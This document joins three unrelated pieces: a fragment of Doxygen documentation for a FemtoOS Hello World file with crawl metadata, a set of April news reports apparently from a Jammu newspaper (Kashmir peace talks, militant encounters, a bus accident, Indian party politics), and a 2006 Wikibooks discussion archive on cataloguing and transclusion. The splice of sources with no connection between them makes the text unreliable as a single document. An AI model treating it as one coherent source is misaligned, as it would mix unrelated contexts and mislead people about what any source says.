The Hello World example is made to get you started, and this is the file you want to play with. Do not use the other examples to that end; that will be a disappointing experience (or a steep learning curve).
Explanation on the website; point your browser at:
Definition at line 40 of file code_TestHelloWorld.c.
Referenced by appLoop_Display(), and appLoop_Speed(). | http://femtoos.org/doxy/code__TestHelloWorld_8c.html | CC-MAIN-2018-26 | refinedweb | 168 | 60.61 |
20 parties called for first round of negotiations
Pant begins talks on Kashmir; invites Hurriyat for dialogue
Involvement of Lashkar, JeM outfits ruled out
Doors not closed for HM, other local groups
NEW
DELHI, Apr 15:
The dialogue process on Kashmir began today, with the
Centre's negotiator, Mr K C Pant, holding in-depth
talks with octogenarian leader Syed Mir Qasim and sending
out formal invitations to leaders of the Hurriyat
Conference and 20-odd political groups to evolve a common
approach on the resolution of the issue.
Mr Pant held one-to-one
meeting with the former Chief Minister, who was briefly
involved in bringing various separatist groups to the
negotiating table late last year but could not play any
major role due to ill-health and lack of response from
the political entities.
The frail-looking Qasim,
during whose tenure prominent Hurriyat leader Abdul Ghani
Lone was a minister and hardliner Syed Ali Shah Geelani
was a legislator, had made some initial moves to probe
the mind of separatist groups some time back without
achieving the desired success.
Addressing a press
conference, Mr Pant said he was ready to discuss all
issues with the Hurriyat, including their proposed visit
to Pakistan for talks with the military regime and
militant groups. But he made it abundantly clear that
there was no scope of talking to Pakistan-based militant
group Lashkar-e-Toiba and Jaish-Mohammed which were
responsible for spreading terror in the Valley.
However, doors were not
closed for Kashmiri organisations, currently engaged in
militancy in the State but desirous of peace. This was
an indication for involving Hizbul Mujahideen, an indigenous
militant group, in the talks in the future.
In the first round of
talks, Mr Pant will cover mainly nationalist parties,
besides some separatist groups like Peoples Front of
Shabir Shah.
Asked about the agenda
for the talks, he said it was unconditional. A meeting
scheduled for tomorrow has been postponed by a few days
due to the death of the daughter of Syed Ali Shah Geelani.
Mr Pant said the talks
were a serious effort and it should not be trivialised.
Mr Pant will meet the leaders of the National
Conference, the Congress, the BJP, the BSP, Left Parties,
Peoples Democratic Party, Panthers Party, Ladakh
Autonomous Hill Council, Imam Khomeini Trust of Kargil,
Awami League and Awami Conference, Islamia group and
others. Mr G M Shah, former Chief Minister and president
of the Awami National Conference, has also been invited.
In his letter to the
political parties, Mr Pant said in order to find
permanent peace in the State it was the responsibility of
"all of us who are genuinely interested in ending
the strife and suffering of the people" to join the
talks.
"I take this
opportunity to invite you for a discussion. I am asking
my office to contact you to fix a mutually convenient
date and time for a meeting."
Mr Pant said he had
been closely associated with Kashmir during Mrs Indira
Gandhi's regime. The 12 years of militancy had
played havoc with the economy, infrastructure and lives
of the people. Tourism had been totally ruined and people
continued to suffer. There was need for a sincere effort
to resolve the problem.
"It was for this
reason that the Government had decided to embark upon a
political dialogue with all sections of the people,
including those who were currently outside. It was our
desire to restore peace and normalcy in the State and
people should come forward to participate in the
dialogue," he said.
He said the APHC had all
along taken the position that the talks should be
unconditional and the Government responded positively.
"It is for APHC to consider whether it would not be
inconsistent for them to set conditions for the
dialogue."
On his brief discussion
with Mr Mir Qasim, he said he was a respectable leader
who had played a very important role in the State
politics.
Mr Pant confirmed that
Nationalist Congress Party leader, Sharad Pawar, who met
Kashmiri leaders during his several visits to the State,
briefed him (Pant) about the talks. (UNI)
Invitation to peace talks is open to all groups
Hurriyat's boycott would be at its own peril: CM
Excelsior Correspondent
SRINAGAR,
Apr 15: Chief
Minister, Dr Farooq Abdullah has said the invitation for
talks by the Centre was open to every one and the
Hurriyat Conference would boycott the peace process only
at its own peril.
"The APHC would be
eliminated if it does not join the talks", Dr
Abdullah told media persons at the inauguration of a
water reservoir and pump house on the Doodhganga water
supply scheme here today. He said the Centre has invited
all Kashmiri groups for talks including the Hurriyat
Conference and if APHC chose to remain away from the
process it would be isolated as in 1996 elections.
Asked about the
situation in the State, he said good developments were
taking place and referred to the nomination by the Centre
of the Deputy Chairman, Planning Commissioner, Mr K C
Pant for holding talks with various groups in Kashmir to
resolve the present turmoil. He hoped that all groups and
political parties would join the talks to find a way out
of the current difficult situation. He said his party
would meet Mr Pant and put forward its point of view but
did not elaborate on the demand it would be making.
"It would be decided by the party", he replied
when a reporter asked him to say about his demand.
In reply to a question on
Fidayeen attacks, he said despite these incidents the
situation was better than before. "These
people", he said, "have been here for many years now
and efforts were on to hunt them". He declined to
specify the strategy for dealing with this situation but
said that a strategy is always there.
He said Pakistan by
silencing her guns on the border had accepted the
unilateral cease-fire but sending of armed men also would
have to be stopped by her to give peace a chance here.
"Border is much better but the trans-border terrorism
has to be stopped by Pakistan", he said.
The Chief Minister set at
rest speculations about Mr Sharad Pawar's recent visit to
the Valley and said he had come here on a holiday with
his family including his daughter and grand daughter. He
said the visit would help in sending a good signal to
intending tourists who might have second thoughts about
the security situation in the Valley. He said this would
convey that the situation in Kashmir was not as bad as
painted by the press.
Dr Abdullah expressed
his dismay over insufficient finances provided by the
Centre saying against the plan size of Rs 1750 crore last
year, the State was provided only Rs 1050 crore. He said
the State needs liberal funding for reconstruction and
development work. "Roads, bridges, schools and
health centres have to be built for which we need a lot
of money", he said and hoped the Centre would
realise this and provide enough funds.
Later, addressing a public
meeting at Kralpora, the site of the inaugurated water
reservoir, the Chief Minister said despite impediments
and constraints, the development process was on. He said
the reconstruction of the damaged infrastructure was a
gigantic task that was being carried out with commitment.
He referred to the scarcity of water following continuous
drought-like situation and appealed to people to make
judicious use of water and power. He said time was not
far away when battles would be fought among nations over
water rather than territory.
The Chief Minister asked
people to pay for the services provided to them by the
Government. He said the State's annual power bill on
import of electricity was a whopping Rs 1000 crore
against which the revenue was only Rs 300 crore. He said
if the State was not in a position to clear its
outstanding, the northern grid would snap electric supply.
He said apart from the huge annual power bill, the State
owes Rs 600 crore to the northern grid on account of
earlier outstanding. He said unless people help
themselves nobody would help them out of the present
situation.
Dr Abdullah asked people
not to pay any heed to those who were misleading them in
the name of the so called Azadi. He said Kashmir would
neither attain freedom nor become a part of Pakistan.
"We have to fight for our rights within India",
he said.
Speaking on the
occasion, the Works Minister, Mr Ali Muhammad Sagar said
some elements were out to vitiate the atmosphere and put
the masses to inconvenience and trouble. He said whatever
be the difficulties the development works would go on.
The vested interests that do not want peace and
prosperity to return would ultimately have to eat humble
pie, he said, adding that the yearning for peace
among people was becoming more and more pronounced.
Mr Sagar asked people to
monitor the development works and ensure that quality
material was used in construction works. He said the
Government was doing its best to provide succor to people
but it was also their duty to see that things were done
in good faith. He assured the local people that their
problems would be looked into and solved.
The Minister said the
Kralpora Bridge whose foundation stone was laid by the
Chief Minister today was a long pending demand of the
people. He said the bridge would cost Rs 1.5 crore and
would be ready by December 5 this year. He said the under
construction Rs 1.5 crore Kanidar Water Supply Sheme
would be completed this year.
Delhi alerts security forces
Pak-aided ultras want exodus of minorities in J&K
From B L Kak
JAMMU,
Apr 15: The
Union Home Ministry has called for tough action against
anti-India subversives and terrorists who are under
"fresh" orders from across the border to
engineer exodus of the members of a particular community
from some areas in the sensitive districts of Doda,
Poonch, Rajouri and Udhampur in the Jammu region.
Official instructions, in
this regard, have come at a time when Government sleuths
came across evidence in the beginning of this week
vis-a-vis the plan to trigger menacing terrorist
violence, which can result in the exodus of members of
Hindu community from some areas of the Jammu province,
particularly the Doda region.
One of the classified
intelligence inputs made available in Naushera sector has
revealed that the Lashkar-e-Toiba and
Harkat-ul-Mujahideen have been directed to increase the
level of anti-India violence by resorting to firing and
use of highly improvised explosive devices (IEDs) against
India security forces and J&K Police personnel in the
State.
A top Government source
told EXCELSIOR that considering the fact that
Pakistan-aided jihadi elements had planned to intensify
attacks on the Indian Army and paramilitary personnel as
well as their camps and vital defence installations, the
J&K administration as well as security forces plus
intelligence agencies across the State "have been
told in unmistakable terms that containment of insurgency
is the first task".
Why does the Kashmir
policy tend most of the time to be groping for a way
around the problem? The Government source replied:
"Our policy is to ensure that the peace process
initiated in November last is not derailed or misused. It
is not ad hoc in nature at all".
According to the source,
even as the Prime Minister, Mr Atal Behari Vajpayee, and
the Home Minister, Mr L K Advani, have appreciated the
J&K Chief Minister's initiative to revitalise
the State police force, Dr Farooq Abdullah has been told
by both of them that the National Conference Government
has to act more vigorously and in "far greater
systematic manner than till now" for ensuring a
significant reduction in levels of militancy,
intensifying the measures already taken and improving
upon them using more sophisticated means for this
purpose.
The source divulged
that the Centre was studying Dr Farooq's proposal
seeking foreign investment in Jammu and Kashmir. The
source also divulged that Mr Vajpayee and Mr Advani had a
basis when they recently told the J&K Chief Minister
that primacy had to be given to the economic
transformation of the State. This would help remove quite
a few grievances relating to educated unemployment and
jobs for youth and bring down levels of alienation.
At a time when traditional
eclectic Islam in the Valley seems to have received a
heavy battering from fundamentalist pro-Pakistan
elements, the Government of India's message to the
J&K Government calling for its attention to the
dangers to the Kashmiri way of life assumes significance.
In fact, the Union Home
Minister wants the J&K administration, particularly
the Chief Minister, to ensure that ultra-orthodox
pro-Taliban forces fail to impose their diktat, through
Lashkar-e-Toiba and Harkat-ul-Mujahideen, over local
lifestyles, dress codes etc.
40 of marriage party injured
JAMMU,
Apr 15: Forty
persons including five children of a marriage party were
injured, two of them critically, when a bus in which they
were travelling fell into Ranbir canal at Baba-Da-Talab
this afternoon.
According to police, the
ill-fated bus bearing registration number JKU-7660
carrying 40 persons of a marriage party was on its way
from Dhangu Chowk, Pathankot to Akhnoor when it met with
accident at Baba-Da-Talab under the jurisdiction of
Kanachak police station.
The driver of the vehicle,
according to eye-witnesses, in an attempt to save his
speeding vehicle from colliding with an Army vehicle
coming from the opposite direction, lost control of the
steering, resulting in the bus colliding with a
stationary truck bearing registration number JK02F-5882.
After the collision both
the truck and bus fell into the Ranbir canal causing
grievous injuries to all the passengers including driver
of the bus.
Getting the report of
accident, a police party from Kanachak police station
rushed to the spot and started rescue operation with the
help of villagers. All the injured were brought out of
the vehicle and shifted to Government Medical College
Hospital where condition of two of them was stated to be
critical.
The injured have been
identified as Ladu Ram of Mukerian, Raju, wife of Baldev,
Prem Chand, Ratna Devi, wife of Gian Chand, Raj Kumari,
daughter of Bachan Lal, Rajni, daughter of Tarsem Lal,
Pawan Kumar, son of Sain Dass, Soma Devi, daughter of
Bachan Lal, Ashok, son of Sham Lal, Kanta Devi, wife of
Ashok Kumar, Ekta, wife of Sham Lal, Bachan Lal, son of
Parshotam Lal, Rani Devi, Bimla Devi, wife of Om Parkash,
Joginder Pal, son of Tej Ram, Shama Devi, wife of Baldev
Raj, Baldev, son of Shanker Dass, Raj Kumar, son of
Bishamber Dass, Kanta Devi, wife of Garu Ram, Jyoti Devi,
wife of Kashmiri Lal, Tarsem Lal, son of Thoru Ram, all
the residents of Pathankote and Kamlesh Kumari, wife of
Babu Ram of Muthi, Jammu.
The condition of Prem
Chand of Pathankote and Kamlesh Kumari of Muthi, Jammu
was stated to be critical till reports last came in.
Kashmir peace process on right
track: Advani
ON
BOARD SPECIAL BSF AIRCRAFT, Apr 15: Asserting that the Jammu and
Kashmir peace process was on the "right track,"
the Centre today said it was for Hurriyat Conference to
respond to the Government's invitation for talks.
"Hurriyat Conference
will also be invited. It is upto them to decide how to
respond," Union Home Minister L K Advani told
reporters while returning from Ravapar in Gujarat after
inaugurating a newly-constructed village.
Asked about rejection of
talks offer by various militant groups, he said "I
don't comment on ad hoc things. After all,
they are also having discussions," he said.
Terming as a significant
development naming of K C Pant as the principal
interlocutor to hold talks with various political and
other groups in J and K, Advani said all sections of the
State, including Congress, National Conference, Kashmiri
Pandits and representatives of Ladakh and Jammu would be
invited to talks.
Advani said two other
significant developments after the announcement of peace
initiatives in Jammu and Kashmir were the statement of UN
secretary general Kofi Annan rejecting implementation of
UN resolutions on Kashmir and Indian Government's
decision to go ahead with fencing of International Border
in Jammu and Kashmir.
"Government even
while pursuing the path of peace, is very much concerned
about security," the Home Minister said adding the
international opinion had significantly altered
post-Kargil.
Referring to the recent US
visit by External Affairs Minister Jaswant Singh, Advani
said although "I have had no occasion to discuss
with him in detail about the talks in Washington, he
briefly told me these were very satisfactory."
On border fencing, he said
despite Pakistan's protest, the Government decided
to resume fencing on 200 km stretch of international
border from Jammu to Kathua which "we had been
considering since coming to power."
He said since the fencing
along the border in Punjab and Rajasthan had been helpful
in checking infiltration and smuggling, similar results
are expected in Jammu and Kashmir.
On the possibility of
another extension to ceasefire in Jammu and Kashmir, he
said the decision is taken by the Cabinet Committee on
Security when the time comes. (PTI)
HM commander shot dead
3 BSF jawans killed; 3 injured in Mahore
UDHAMPUR,
Apr 15: The
Border Security Force (BSF) suffered a major setback in
its anti-militancy operations when it lost three BSF
jawans while three others got seriously injured in an
ambush laid by the militants at Thapral Top in Mahore
tehsil this evening.
A Hizbul Mujahideen
commander was also killed in the retaliatory
firing by BSF.
Official reports reaching
here said that a patrol party of BSF was ambushed by a
big group of militants, numbering between eight and 10,
from atop a hill in Thapral Top this evening. The
security jawans were carrying out a routine patrolling in
the area when the militants resorted to indiscriminate
firing and launched grenade attacks on them.
As the militants had taken
advantageous positions on the hills, they succeeded in
causing serious bullet injuries to six jawans. Despite
being injured, the jawans fired back and eliminated a
commander of the group, who was leading the
militants.
Additional force of BSF
rushed to the spot immediately. However, by then, three
injured BSF jawans had succumbed to their wounds. Three
other injured jawans were airlifted to Udhampur and
admitted in the Command Hospital. Their condition was
also stated to be critical.
The slain militant has
been identified as Hafiz Syed alias Gul Abbas, hailing
from Lahore in Pakistan. He was a hardcore militant of
Hizbul Mujahideen outfit and was commanding the group,
which attacked BSF patrol party.
One AK-56 rifle with three
magazines and 31 rounds, one wireless set and a hand
grenade were recovered from the possession of Gul Abbas.
Other militants managed to escape from the encounter
site.
Three deceased BSF jawans
have been identified as Havildar Mohan Jha, and
constables Rajinder Parsad and Sita Ram. Their bodies
will be flown to their native towns tomorrow morning.
BSF have cordoned off
Thapral Top from all four sides and launched a massive
operation to kill the militants involved in laying
ambush.
Our Rajouri
correspondent adds: A civilian and an army jawan were
injured in an encounter with the militants at village
Khablan under the jurisdiction of Thanna Mandi police
station this afternoon.
The injured civilian has
been identified as Mohd Din. He was trapped in the
exchange of firing between army and militants and got
injured. He has been hospitalised.
After about an hour long
gun-fight, the militants managed to escape. Troops were
trying to chase and eliminate the militants.
In another incident, a
Village Defence Committee (VDC) member fired a shot in
air in village Jamola near Rajouri this morning. No one
was injured in the shoot-out.
Big success by STF Doda, RR
4 top Jaish militants gunned down in Warwan
JAMMU,
Apr 15: Four
hitmen of Azhar Masood's Jaish-e-Mohammed outfit
including a district commander Hamid
Kishtwari were killed in an encounter with Special Task
Force (STF) and Rashtriya Rifles in remote area of
Warwan, ahead of Marwah, in Kishtwar tehsil of Doda
district this morning.
Three militants of the
same group had been shot dead by the same forces few days
back in Marwah area. The four militants killed today had
managed to escape from Marwah encounter and took shelter
in Warwan forests.
SSP Doda Ashkoor Wani,
when contacted, told EXCELSIOR on telephone from Doda
that jawans of STF with the back-up of 11 Rashtriya
Rifles were continuing searches in Warwan, the last
village of Doda bordering Zanskar in Ladakh, following
reports that four militants, who had escaped during an
encounter in Marwah three days back, had fled to Warwan
and taken shelter there in a forest area.
STF and army jawans
continued massive searches in Warwan for the last two
days and finally succeeded in locating the militants in
one of the dense forests. Security personnel asked the
militants to lay down their arms and surrender.
However, two militants
started running in an opposite direction while two other
opened firing on police and army soldiers, who fired back
in self defence. A fierce exchange of gun-fighting ensued
between the two sides at about 0700 hours today and
continued for four hours.
STF and Rashtriya Rifles
jawans succeeded in eliminating all four dreaded
militants. One STF jawan sustained minor injuries in the
operation. His condition was stated to be out of
danger.
Official sources said
bodies of all four slain militants have been recovered
from the scene of encounter. One of them was later
identified as Hamid Kishtwari, a district
commander of Jaish-e-Mohammed. Identity of
Kishtwari's three associates couldn't be
established as they were not carrying any identity card
with them. All of them were foreign mercenaries, hailing
from Pakistan and Afghanistan.
Four AK-56 rifles, 25
magazines, 340 rounds, two wireless sets, 22 grenades,
explosive devices and other ammunition were recovered
from the possession of killed militants.
Sources said with the
elimination of four militants, all seven militants of
Jaish-e-Mohammed group who were active in Warwan and
Marwah, have been killed. With their killings, the people
of remote villages have heaved a sigh of relief.
In fact, the sources said,
these were the local people who had tipped off army and
police regarding presence of the militants in their
areas. The militants used to harass civilians by forcing
them to prepare food for them daily. Besides, the foreign
mercenaries also used to harass the young girls.
SSP holds talks as bandh enters
9th day
UDHAMPUR,
Apr 15: SSP
Udhampur Deepak Kumar left for tense Basantgarh town this
morning where an indefinite bandh and dharna entered into
ninth day today in protest against alleged atrocities on
people by police personnel of a special mobile party
during a search operation.
People of Basantgarh had
been from the very first day of agitation demanding a
visit to the town by a senior police officer like DIG
Udhampur-Doda range Sheikh Owais Ahmed and SSP Udhampur
Deepak Kumar.
Reports reaching here said
the SSP reached Basantgarh late this evening and had
talks with representatives of the people, who had formed
a Joint Action Committee (JAC), which was spearheading
the agitation.
However, details of the
talks couldn't be gathered till late tonight.
Negotiations were expected to resume tomorrow morning in
which the dead-lock was expected to be broken.
Meanwhile, shops remained
closed in Basantgarh for ninth straight day today. An
indefinite dharna also continued in the town, which was
joined by women and children.
As already reported, a
special mobile cell of police had resorted to beating-up
of local people of both communities including women and
children while carrying out searches. Since then, the
people had been observing a complete bandh in Basantgarh
demanding stern action against erring police personnel.
However, no senior police
officers visited the town for nine days forcing the
people to prolong their agitation.
Meanwhile, a bandh was
also observed in Majouri village for third day today
demanding upgradation of middle school upto 9th class.
There was no response to people's agitation by the
administration.
Vajpayee says he will speak to
Sonia again
LUCKNOW,
Apr 15: A day
after Congress boycotted the all-party meeting called to
resolve the impasse in Parliament over Tehelka issue,
Prime Minister Atal Behari Vajpayee today said he would
speak to Congress president Sonia Gandhi to ensure smooth
functioning of the house when its budget session resumes
tomorrow.
Addressing a press
conference at Raj Bhawan here, Vajpayee, appearing
conciliatory, said no probe has been ordered into the
charges levelled by Janata Party president Subramanian
Swamy against Gandhi and her family-members but had, at
the same time, a tough message for Congress saying the
Bofors case was progressing and that party may be in the
dock.
Congress deputy leader in
Lok Sabha Madhavrao Scindia termed as
"unsatisfactory" the explanation given by the
Prime Minister that Government had not ordered any CBI
probe into Swamy's charges.
"No CBI probe has
been ordered into Swamy's charges against Sonia
Gandhi and only preliminary inquiries are being made to
establish whether there is any need to have it probed by
CBI," he said.
Vajpayee said he had
spoken to Gandhi when he was in Tehran recently and
"I will speak to her again and try to persuade her
to help run Parliament smoothly".
The Congress president, in
her capacity of leader of the opposition, can help in
ensuring smooth proceedings in the Lok Sabha, the Prime
Minister said.
Vajpayee said the case
relating to kickbacks in Bofors gun deal was progressing
and Congress "may find itself in the docks".
"Bofors case Pragati
Par Hai Aur Congress Party Kathghare Mein Khari Ho Sakti
Hai (Bofors case is in progress and Congress may
find itself in the docks)," he said.
Seeking to signal that
Government was not forcing the pace of Bofors case to
counter Tehelka expose, the Prime Minister said "we
are not doing anything from our side but it is just a
coincidence that some corruption cases have started
progressing."
Earlier, addressing an
NDA-sponsored Kisan Rally here, Vajpayee said Congress
and other opposition parties were not prepared to debate
in Parliament the Tehelka expose and "their threat
of a direct fight with the Government will create chaos
and anarchy in the country."
This would start a
wrong trend, he said, adding "if BJP adopts similar
tactics in Congress-ruled states where it is the main
opposition party, what would Congress do?"
Attacking the Congress for
resorting to "undemocratic means" to topple his
Government, Vajpayee dared the opposition to bring a
no-confidence motion and said if his Government failed to
prove majority on the floor of the House, it would quit
as it had done in the past when it lost by only one vote.
Stating that corruption
was a serious issue that needed to be addressed, he said
Congress, unlike BJP, was not in favour of bringing the
Prime Minister under the purview of Lok Pal Bill. (PTI)
Mohsina Kidwai arriving today
JAMMU,
Apr 15: All
India Congress (I) Committee general secretary Mrs
Mohsina Kidwai is arriving here tomorrow morning on her
first visit to the State after taking over the charge of
party affairs in Jammu and Kashmir.
Mrs Kidwai will be
accompanied by PCC (I) president Mohd Shaffi Qureshi.
Centre
should have initiated talks on
Kashmir much earlier
BHOPAL,
Apr 15: The
Centre should have initiated the process of dialogue
immediately after announcing ceasefire in Kashmir three
months back, according to former Sadar-e-Riyasat of Jammu
and Kashmir Dr Karan Singh.
"Initiating talks at
this stage does not have any relevance," Dr Singh,
now a Congress MP, said.
Asked to outline a
solution to the vexed problem, he said "the problem
is very grave and requires to be ameliorated," he,
however, refused to elaborate further.
Dr Singh conceded that the
situation in Kashmir had become grave and complicated
over the last 12 years.
"The escalation in
violence in Kashmir , after Rajiv Gandhi was removed from
power, has continued unabated."
He also expressed concern
over corruption in the country and called for a
revolution. "This revolution should not be violent
but in tune with the Indian society". (UNI)
Netaji died in
Russian cell, says Bodyguard
VIJAYAWADA,
Apr 14: The
bodyguard of Netaji Subhash Chandra Bose, Shobharam
Dokas, today claimed that the great patriot had died in a
Russian Cell and not in an air crash as has been talked
about.
Dokas, who was here to
attend the All India Freedom Fighters National General
Council, told reporters that "Netaji is not alive.
Even if he is alive, his age would be 104 and chances for
his survival are very rare."
"Bose, who recruited
Indian Prisoners of War in the Azad Hind Sena, was a
great leader, who believed in sacrificing everything for
the freedom of the nation," Dokas said.
He said "during the
course of freedom struggle, he left from Bangkok to
Russia via Mongolia and later went missing. Though I
was his bodyguard, due to certain reasons I could not
accompany him as I was made incharge of an area during
the freedom struggle."
"We, as freedom
fighters, are vexed with the present murky politics.
Corruption has raised its head in every sphere. We have
decided to create awareness among the people about the
present political, economic and social scenario," he
added.(PTI)
TC shouldn't have pulled
out of NDA: Panja
KOLKATA,
Apr 14:
Trinamool Congress (TC) MP Ranjit Kumar Panja today said
the TC-BJP alliance would have had a smooth sailing in
the coming West Bengal Assembly polls had TC persisted
with the NDA.
Describing the decision of
TC chief Mamata Banerjee to pull out of the NDA as
abrupt, Panja said it would now be
difficult to convince voters of the new
TC-Congress alliance in the elections.
"As we had been
opposing the Congress all along it may be difficult for
us to convince the ordinary voters, if not the
enlightened ones, about the alliance," he told PTI
here.
Panja said he also had
reservations about selection of party candidates for the
coming polls in his Barasat Lok Sabha constituency.
"I had indicated my
preferences, based on the prospects of each nominee. But
in most seats those ranked lower in the order have been
given tickets".
However, Panja scotched
speculation about his joining the BJP, saying "such
theories have no substance".
Panja, a noted
dermatologist who had been elected twice consecutively
from the North 24 Parganas constituency, said "I am
not out and out a politician. If I have ideological
differences with my party, I have the option of quitting
politics".
However, Panja hastened to
add that in such a scenario he would first hold
discussions with Banerjee.
Meanwhile, the Left Front
today alleged that Trinamool Congress (TC) was still
keeping in contact with the BJP-led National Democratic
Alliance (NDA) and was keeping its options open.
"Even though two of
the TC Ministers have tendered their resignation from the
NDA Government, the party has not yet informed the
President if they had withdrawn their support to
NDA," State CPI(M) secretary Anil Biswas told
reporters here.
Biswas said Trinamool
Congress had not written any letter to the President in
this regard as it wanted to keep its options open to
take a step suitable to it after the assembly elections
in West Bengal were over.
He further alleged that TC
was taking funds from corporates and business houses for
electioneering. "The way Trinamool has embarked on
huge spending on cutouts and posters is quite
amazing," he said.
"We would like to
know from them the sources of their funds. Where from are
they getting such huge funds to spend on cutout and
banners?" Biswas said.
Explaining the CPI(M)'s
position, Biswas said, "our members contribute to
party fund and even now a fund collection drive was going
on. Only last week we had organised a mass collection
drive in districts and more such drives would be
undertaken before the coming elections."
The Left Front today
released a joint appeal by Jyoti Basu, West Bengal Chief
Minister Buddhadev Bhattacharya, and leaders of other
front constituents, asking the electorate to vote for the
front candidates in the assembly election in the State.
(PTI)
Ghani still adamant
MALDA,
Apr 14 :
Veteran Congress leader A B A Ghani Khan Chowdhury today
reiterated his stand that his party would never concede
the two contentious seats of Englishbazar and
Harishchandrapur to its new poll ally Trinamool Congress.
Ruling out any such
concession to the Trinamool, the MP from Malda told
newsmen that Gautam Chakraborty would be fielded as his
party's nominee from Englishbazar and Mostaq Alam
from Harishchandrapur.
The Trinamool Congress,
which released its list of contestants yesterday, has
claimed that it would put up its candidates from both the
seats falling within Chowdhury's native Malda
district, but has not announced the names of party
candidates so far.
Chowdhury, however, struck
a conciliatory tone on old Malda, saying discussions were
being held with the party high command on the
Trinamool's request for the seat.
The senior Congress leader
refused to attach any importance to the Congress Bachao
Committee floated by three dissident party MLAs, and
claimed that they did not have the ability to weaken the
party.(PTI)
Wikibooks:Reading room/Archive 18
From Wikibooks, the open-content textbooks collection
Card Catalog Office and other sidebar issues
I'm not sure this is consistent with the best way of searching for things and the discussions regarding categorisations above (although I do appreciate that a lot of effort, particularly Rob's, has gone into it). I do wonder though whether it has a future, and even if it does, whether it is really worthy of being linked to in the sidebar. Indeed, to my mind, the sidebar needs a bit more reorganisation, putting the links to community pages down a bit, and perhaps renaming the "all bookshelves" and "all books" bits as "search by subject" and "search alphabetically" instead, Jguk 18:29, 18 April 2006 (UTC)
- Yes, unless categorization in the card catalog office is forced (via a {{cleanup-link}}-esque template) and {{Catalog}} is used, I think the card catalog office should be scrapped altogether. (Imagine if a library only had a random half of its books catalogued.) As for the sidebar, I think that having both a "tools" and a "toolbox" section is redundant. --Hagindaz 23:05, 18 April 2006 (UTC)
- The whole point of the Card Catalog Office was to bring up the issues of organizing the content of Wikibooks, and have a central discussion area, separate from the Staff Lounge, where discussion among people interested in organizing the ontology of Wikibooks could occur. In that regard, I think it is still a valid project, but the problem here has always been trying to recruit people to be involved with the issue. If the CCO is a failed experiment, so be it. I still think major discussion about this issue needs to take place, and it will be an ongoing issue as well. And if the CCO is being scrapped, there should be something to take its place. If you don't think finding content on Wikibooks is a problem, and that Special:Allpages is the best solution, go ahead and scrap the CCO and the idea.
- I am opposed to a monolithic ontology for Wikibooks, and the category system of MediaWiki software is also inadequate for cataloging Wikibooks as well. Much of the problem I've been facing is to simply identify what is a Wikibook, which is precisely why I started Wikibooks:Alphabetical Classification. If you are complaining about how slow I've personally been in trying to catalog Wikibooks, you are operating on far too short of a timespan here. This is something that is going to take time, and I've been deliberately moving slowly to make sure that I've covered the major issues, as well as to identify the tools necessary to deal with the task. It is a huge task to try and catalog anything, and with almost 15,000 pages of content and no real organization at the moment, the task for the current Wikibooks content alone is in reality something more than one person can deal with on their own. --Rob Horning 09:33, 19 April 2006 (UTC)
This section has temporarily been suppressed. I have started moving some info from WP and modifying it - but it needs quite a bit of improving. Also, many pages currently in the Wikibooks namespace, more properly belong in the Help namespace and should be moved there. If people have ideas on how to improve it, please just go ahead, or note the ideas here for discussion, Jguk 18:29, 18 April 2006 (UTC)
Any help, Robin? :) Jguk 19:44, 18 April 2006 (UTC)
request help
I am beginning to see the challenges of working here at Wikibooks. I have to confess that I'm a POV warrior, but I am trying to reform. I keep finding myself with serious writer's block. I think my biggest problem is that subliminally, I'm still an info warrior in a solitary crusade against an army of trolls. I keep trying to solve this problem by imagining Jimbo Wales as the guy I am writing to. This works some, but Jimbo Wales is pretty absent from my process, and haunting his discussion page doesn't really put me in touch with his head as much as it makes me realize that lame people are everywhere. I had a big brainstorm yesterday. I was happy and proud of myself for writing a few pages in as many hours for the first time. Until I went and looked at it this morning. It's a big phat POV nightmare. Honestly, as such things go, it's more factual and truthful than almost any other POV nightmare, but it's still not even something I'd normally want anybody to see here. My original idea was to vanish it and start over, but there are a lot of good points, and I think that even the POV points could be considered as good starting points. What I guess I am looking for is a compassionate NPOV coach, somebody to help me draw those lines, and to help me frame my reference point in my head for who and how I should be writing.
If anybody has the spare time and energy, I'd appreciate some feedback. Please know that I have no intention of leaving the big mess up any longer than it takes to fix it. Prometheuspan 18:46, 19 April 2006 (UTC)
Wikiversity status change?
I noticed Wikiversity has been removed from Wikibooks main menu. Has the Board finally moved to approve/disapprove Wikiversity or is this unilateral action by some Wikibookean at large? Lazyquasar 09:35, 20 April 2006 (UTC)
- I think this is a (hopefully temporary) cock-up by the developers, who were testing out something new with the sidebar. Somehow our sidebar, which remains unchanged on MediaWiki:Sidebar, has been replaced by that of the English Wikipedia! I hope normal service will be resumed shortly. I also hope that Wikiversity makes a proper go of it at Wikibooks and the proposed schism gets put to rest, Jguk 10:09, 20 April 2006 (UTC)
- There has been no move on the part of Wikibooks administrators to formally remove Wikiversity from Wikibooks in any significant manner, and I would fight that until a replacement was live, or some significant alternative was presented. There was a substantial server crash yesterday on the English-language server farm, and I think the developers are trying to recover from that incident, together with a huge crushing load of page requests. I suspect that the sidebar issues are a result of that incident as well, where they had to recreate some of the content from backups. If you made any substantial edits in the past couple of days, I would strongly suggest that you review your recent contributions to see if they made it into the current database. --Rob Horning 10:19, 20 April 2006 (UTC)
Categories Within Pages
Is there any way to include part of a page on another page, but not the whole page (possibly using categories)? For example, imagine a language book had 4 pages: Dialogues, Grammar, Vocabulary and Exercises, each with content organized by lesson and section. Could you create each section's page by including the grammar, dialogues, vocabulary and exercises from the 4 pages (dialogues, grammar, vocab and exercises)? Kind of like how US History/Print version was created, except taking only sections of pages instead of entire pages. DettoAltrimenti 11:03, 21 April 2006 (UTC)
- Use <noinclude>text to not include in transcluded page</noinclude> around text you only want to appear on the page itself, but not on the transcluded page. To only include text on another page but not on the page itself, use <includeonly>text to include only on the transcluded page</includeonly>. That may be useful for titles or categories.
- If you want to include different sections of a page on different pages, you can use
<div class="{{switch|{{SUBPAGENAME}}|case: Dialogues=|case: Lesson 1=|default=hiddenStructure}}"> text to only appear on pages titled "Language/Dialogues" and "Language/Lesson 1," but not on any other page </div>
--Hagindaz 13:47, 21 April 2006 (UTC)
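To make the combination concrete, here is a minimal sketch of the two tags working together; the page names, heading and category below are hypothetical, and a main-namespace page is transcluded with the leading-colon syntax {{:PageName}}:

```
<!-- Saved as the page "Language/Grammar" -->
<noinclude>This note appears only when viewing Language/Grammar directly.</noinclude>
== Lesson 1: Nouns ==
Grammar notes for lesson 1 go here.
<includeonly>[[Category:Transcluded grammar sections]]</includeonly>

<!-- On the page "Language/Lesson 1", pull the whole page in with: -->
{{:Language/Grammar}}
```

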